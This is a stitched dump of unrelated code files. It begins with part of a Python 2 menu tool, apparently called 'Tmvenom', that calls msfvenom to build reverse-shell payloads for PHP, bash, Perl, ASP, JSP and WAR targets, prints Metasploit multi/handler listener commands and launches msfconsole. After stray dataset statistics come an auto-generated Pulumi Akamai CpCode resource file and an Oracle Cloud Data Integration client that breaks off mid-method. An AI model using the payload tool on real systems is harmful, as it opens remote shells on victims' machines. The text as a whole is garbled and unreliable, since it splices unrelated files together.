print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload python/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
print ''
print cyan + '---------------------------------------------------------'
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def php():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/payload.php'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p php/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -o ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload php/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def bash():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/shell.sh'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p cmd/unix/reverse_bash LHOST=' + ip + ' LPORT=' + por + ' -f raw > ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload cmd/unix/reverse_bash'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def perl():
pt()
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/shell.pl'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p cmd/unix/reverse_perl LHOST=' + ip + ' LPORT=' + por + ' -f raw > ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload cmd/unix/reverse_perl'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def asp():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/shall.asp'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p windows/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f asp > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload windows/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def jsp():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/shall.jsp'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p java/jsp_shell_reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f raw > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload java/jsp_shell_reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def war():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/shall.war'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p java/jsp_shell_reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f war > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload java/jsp_shell_reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def menu():
os.system('clear')
print '\x1b[1;92m'
logo()
pt()
print red + ' <<---------------[ PAYLOAD MENU ]---------------->> v 2.0'
pt()
print red + ' [a] ==>' + green + ' Author info ' + red + ' [h] ==>' + green + ' help '
pt()
print red + ' [1] ==>' + green + ' Android payload ' + red + ' [l] ==>' + green + ' all payload list '
pt()
print red + ' [2] ==>' + green + ' Python Payload '
pt()
print red + ' [3] ==>' + green + ' Php Payload '
pt()
print red + ' [4] ==>' + green + ' Windows Payload '
pt()
print red + ' [5] ==>' + green + ' Linux Payload '
pt()
print red + ' [6] ==>' + green + ' Mac Payload '
pt()
print red + ' [7] ==>' + green + ' Perl Payload '
pt()
print red + ' [8] ==>' + green + ' Bash Payload '
pt()
print red + ' [9] ==>' + green + ' Asp Payload '
pt()
print red + ' [10] ==>' + green + ' Jsp Payload '
pt()
print red + ' [11] ==>' + green + ' War Payload '
pt()
print red + '--------------------------------------------'
pt()
op = raw_input('\x1b[1;96mSelect@[\x1b[1;91m Tmvenom \x1b[1;96m]#:\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9d\xaf \x1b[1;92m')
if op == '1':
os.system('clear')
pt()
android()
elif op == '2':
os.system('clear')
pt()
python()
elif op == '3':
os.system('clear')
pt()
php()
elif op == '4':
os.system('clear')
pt()
windows()
elif op == '5':
os.system('clear')
pt()
linux()
elif op == '6':
os.system('clear')
pt()
mac()
elif op == '7':
os.system('clear')
pt()
perl()
elif op == '8':
os.system('clear')
pt()
bash()
elif op == '9':
os.system('clear')
pt()
asp()
elif op == '10':
os.system('clear')
pt()
jsp()
elif op == '11':
os.system('clear')
pt()
war()
elif op == 'l':
pt()
os.system('msfvenom -l')
pt()
again()
elif op == 'h':
pt()
print cyan + ' <<< msfvenom help >>>'
print green
os.system('msfvenom -h')
pt()
print cyan + ' <<< msfconsole help >>>'
print green
os.system('msfconsole -h')
pt()
again()
elif op == 'a':
auth()
elif op == 'e':
print '\x1b[1;92m Exiting......'
else:
again()
menu()
| 39.43876
| 739
| 0.51313
| 3,336
| 25,438
| 3.889089
| 0.063549
| 0.081394
| 0.12209
| 0.162787
| 0.837984
| 0.829197
| 0.823031
| 0.817712
| 0.806228
| 0.805611
| 0
| 0.106389
| 0.268378
| 25,438
| 644
| 740
| 39.5
| 0.590726
| 0.008766
| 0
| 0.775
| 0
| 0.013333
| 0.532572
| 0.238872
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008333
| null | null | 0.44
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
90fab3fbac55051a798d96fb0bd78f8b9894727c
| 14,958
|
py
|
Python
|
sdk/python/pulumi_akamai/properties/cp_code.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-01-21T15:22:12.000Z
|
2021-08-25T14:15:29.000Z
|
sdk/python/pulumi_akamai/properties/cp_code.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 59
|
2020-08-13T14:39:36.000Z
|
2022-03-31T15:19:48.000Z
|
sdk/python/pulumi_akamai/properties/cp_code.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CpCodeArgs', 'CpCode']
@pulumi.input_type
class CpCodeArgs:
def __init__(__self__, *,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CpCode resource.
"""
if contract is not None:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
if contract is not None:
pulumi.set(__self__, "contract", contract)
if contract_id is not None:
pulumi.set(__self__, "contract_id", contract_id)
if group is not None:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
if group is not None:
pulumi.set(__self__, "group", group)
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if name is not None:
pulumi.set(__self__, "name", name)
if product is not None:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
if product is not None:
pulumi.set(__self__, "product", product)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
@property
@pulumi.getter
def contract(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract")
@contract.setter
def contract(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract", value)
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract_id")
@contract_id.setter
def contract_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract_id", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
@pulumi.input_type
class _CpCodeState:
def __init__(__self__, *,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CpCode resources.
"""
if contract is not None:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
if contract is not None:
pulumi.set(__self__, "contract", contract)
if contract_id is not None:
pulumi.set(__self__, "contract_id", contract_id)
if group is not None:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
if group is not None:
pulumi.set(__self__, "group", group)
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if name is not None:
pulumi.set(__self__, "name", name)
if product is not None:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
if product is not None:
pulumi.set(__self__, "product", product)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
@property
@pulumi.getter
def contract(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract")
@contract.setter
def contract(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract", value)
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract_id")
@contract_id.setter
def contract_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract_id", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
warnings.warn("""akamai.properties.CpCode has been deprecated in favor of akamai.CpCode""", DeprecationWarning)
class CpCode(pulumi.CustomResource):
warnings.warn("""akamai.properties.CpCode has been deprecated in favor of akamai.CpCode""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a CpCode resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[CpCodeArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a CpCode resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param CpCodeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CpCodeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""CpCode is deprecated: akamai.properties.CpCode has been deprecated in favor of akamai.CpCode""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CpCodeArgs.__new__(CpCodeArgs)
if contract is not None and not opts.urn:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
if group is not None and not opts.urn:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["name"] = name
if product is not None and not opts.urn:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
super(CpCode, __self__).__init__(
'akamai:properties/cpCode:CpCode',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None) -> 'CpCode':
"""
Get an existing CpCode resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CpCodeState.__new__(_CpCodeState)
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["name"] = name
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
return CpCode(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def contract(self) -> pulumi.Output[str]:
return pulumi.get(self, "contract")
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "contract_id")
@property
@pulumi.getter
def group(self) -> pulumi.Output[str]:
return pulumi.get(self, "group")
@property
@pulumi.getter(name="groupId")
def group_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "group_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def product(self) -> pulumi.Output[str]:
return pulumi.get(self, "product")
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "product_id")
| 40.427027
| 134
| 0.621139
| 1,734
| 14,958
| 5.130911
| 0.078431
| 0.082837
| 0.102282
| 0.155783
| 0.828931
| 0.815219
| 0.801731
| 0.791166
| 0.77026
| 0.724401
| 0
| 0.00009
| 0.257722
| 14,958
| 369
| 135
| 40.536585
| 0.801225
| 0.073339
| 0
| 0.824138
| 1
| 0
| 0.145355
| 0.007535
| 0
| 0
| 0
| 0
| 0
| 1
| 0.144828
| false
| 0.003448
| 0.017241
| 0.072414
| 0.248276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2917afe98cc0b2f4b0173004907a2390ab15003f
| 541,292
|
py
|
Python
|
src/oci/data_integration/data_integration_client.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/data_integration/data_integration_client.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/data_integration/data_integration_client.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import data_integration_type_mapping
missing = Sentinel("Missing")
class DataIntegrationClient(object):
"""
Use the Data Integration Service APIs to perform common extract, load, and transform (ETL) tasks.
"""
def __init__(self, config, **kwargs):
"""
Creates a new service client
:param dict config:
Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
The :py:meth:`~oci.config.from_file` method can be used to load configuration from a file. Alternatively, a ``dict`` can be passed. You can validate_config
the dict using :py:meth:`~oci.config.validate_config`
:param str service_endpoint: (optional)
The endpoint of the service to call using this client. For example ``https://iaas.us-ashburn-1.oraclecloud.com``. If this keyword argument is
not provided then it will be derived using the region in the config parameter. You should only provide this keyword argument if you have an explicit
need to specify a service endpoint.
:param timeout: (optional)
The connection and read timeouts for the client. The default values are connection timeout 10 seconds and read timeout 60 seconds. This keyword argument can be provided
as a single float, in which case the value provided is used for both the read and connection timeouts, or as a tuple of two floats. If
a tuple is provided then the first value is used as the connection timeout and the second value as the read timeout.
:type timeout: float or tuple(float, float)
:param signer: (optional)
The signer to use when signing requests made by the service client. The default is to use a :py:class:`~oci.signer.Signer` based on the values
provided in the config parameter.
One use case for this parameter is for `Instance Principals authentication <https://docs.cloud.oracle.com/Content/Identity/Tasks/callingservicesfrominstances.htm>`__
by passing an instance of :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner` as the value for this keyword argument
:type signer: :py:class:`~oci.signer.AbstractBaseSigner`
:param obj retry_strategy: (optional)
A retry strategy to apply to all calls made by this service client (i.e. at the client level). There is no retry strategy applied by default.
Retry strategies can also be applied at the operation level by passing a ``retry_strategy`` keyword argument as part of calling the operation.
Any value provided at the operation level will override whatever is specified at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
"""
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20200430',
'service_endpoint_template': 'https://dataintegration.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
self.base_client = BaseClient("data_integration", config, signer, data_integration_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
def change_compartment(self, workspace_id, change_compartment_details, **kwargs):
"""
Moves a workspace to a specified compartment.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.ChangeCompartmentDetails change_compartment_details: (required)
The information needed to move a workspace to a specified compartment.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/change_compartment.py.html>`__ to see an example of how to use change_compartment API.
"""
resource_path = "/workspaces/{workspaceId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
